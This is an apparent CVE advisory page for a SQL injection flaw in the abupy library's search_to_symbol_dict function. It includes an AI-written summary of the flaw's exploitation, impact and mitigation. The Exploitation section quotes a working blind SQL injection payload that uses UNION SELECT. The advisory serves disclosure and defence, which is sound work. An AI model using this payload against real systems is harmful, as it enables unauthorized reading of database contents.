VYPR
← All advisories
Unrated severityNVD Advisory· Published Sep 5, 2023· Updated Sep 30, 2024

CVE-2023-39654

CVE-2023-39654

Description

abupy up to v0.4.0 was discovered to contain a SQL injection vulnerability via the component abupy.MarketBu.ABuSymbol.search_to_symbol_dict.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

SQL injection in abupy <= v0.4.0 via search_to_symbol_dict allows arbitrary SQL execution.

Vulnerability

A SQL injection vulnerability exists in the abupy library up to version v0.4.0, specifically in the abupy.MarketBu.ABuSymbol.search_to_symbol_dict function [1][2]. The function is designed to search for stock symbols but fails to sanitize user-supplied input, allowing an attacker to inject arbitrary SQL commands into the underlying SQLite query [2]. The affected versions are all releases up to and including v0.4.0 [1].

Exploitation

An attacker can exploit this vulnerability by calling search_to_symbol_dict with a crafted string argument [2]. No authentication or special privileges are required because the function is a public API intended for normal use [2]. The payload uses a UNION SELECT statement with a conditional expression (e.g., sqlite_version() = '3.31.1') to perform blind SQL injection [2]. For example, the payload "us----' union select case when (sqlite_version() = '3.31.1') then 'usJASNW' else 'usTROVW' end where ''='" returns different results depending on the truth of the condition, confirming SQL code execution [2].

Impact

Successful exploitation allows an attacker to execute arbitrary SQL queries against the SQLite database used by abupy [2]. This can lead to information disclosure, such as extracting database version, table contents, or other sensitive data stored in the database [2]. The proof-of-concept demonstrates the ability to evaluate arbitrary boolean conditions, enabling blind data extraction [2]. The attacker gains the ability to read any data accessible to the application, potentially compromising confidentiality.

Mitigation

As of the publication date (2023-09-05), no patched version has been released [1][2]. The latest version v0.4.0 remains vulnerable. Users should avoid passing untrusted input to the search_to_symbol_dict function and consider implementing input validation or parameterized queries as a workaround. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Monitor the official repository [1] for future updates.

References
  1. GitHub - bbfamily/abu: 阿布量化交易系统(股票,期权,期货,比特币,机器学习) 基于python的开源量化交易,量化投资架构
  2. leeya_bug/[Warning]SQL Injection in abupy <= v0.4.0.md at main · Leeyangee/leeya_bug

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • abupy/abupydescription
  • bbfamily/abullm-create
    Range: <=0.4.0

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

1

News mentions

0

No linked articles in our index yet.